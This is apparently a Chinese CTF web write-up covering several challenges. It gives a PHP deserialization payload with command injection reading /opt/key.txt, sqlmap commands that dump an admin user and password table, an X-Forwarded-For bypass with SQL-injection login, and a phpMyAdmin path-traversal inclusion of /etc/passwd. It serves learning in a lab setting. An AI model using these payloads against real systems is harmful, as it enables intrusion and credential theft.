合天御宅战疫-web-wp
合天御宅战疫-web-wp
签到
如图所示
改成key{XXXX}提交
脑袋有点大
用bp抓包,在响应中找到key
统一登录
打开界面,要登陆,登录不上,用dirmap扫一下目录
找到源码泄露,下载下来
代码审计
在common文件夹下找到home.php,wakeup函数有一个waf过滤,最下方的
1 | $a=@$_POST['a']; |
可以想到构造反序列化对象,直接执行我们构造的对象,利用system函数,home后面的数字大于2可以绕过wakeup函数从而绕过过滤
构造payload
1 | a=O:4:"home":3:{s:12:"%00home%00method";s:4:"ping";s:10:"%00home%00args";a:1:{i:0;s:26:"127.0.0.1;cat /opt/key.txt";}} |
后台key
存在数字型sql注入
用sqlmap跑一下
爆库
1 | sqlmap -u "http://118.190.100.227:5001/?r=content&cid=1" -p "cid" --dbs |
爆表
1 | sqlmap -u "http://118.190.100.227:5001/?r=content&cid=1" -p "cid" -D seacms --tables |
爆字段
1 | sqlmap -u "http://118.190.100.227:5001/?r=content&cid=1" -p "cid" -D seacms -T manage --columns |
爆内容
1 | sqlmap -u "http://118.190.100.227:5001/?r=content&cid=1" -p "cid" -D seacms -T manage -C user,password --dump |
得到用户名和密码后,由于密码MD5加密了,所以用md5解密一下,得到密码登录系统,根据提示找到key
后台登录
打开发现静止访问,但是响应码为200说明可能因为是后台登录系统做了限制,改xff头后顺利访问
使用万能密码登录,成功获取key
phpmyadmin
根目录下面的robots.txt指明了key的位置
通过增加常用文件名phpmyadmin,成功找到登录地址
用弱口令root/root登录后,先尝试包含/etc/passwd判断目录层级
1 | http://114.215.40.251:5002/phpmyadmin/index.php?a=phpinfo();&target=export.php%253f/../../../../../etc/passwd |
然后再去包含key
1 | http://114.215.40.251:5002/phpmyadmin/index.php?a=phpinfo();&target=export.php%253f/../../../../../opt/key.txt |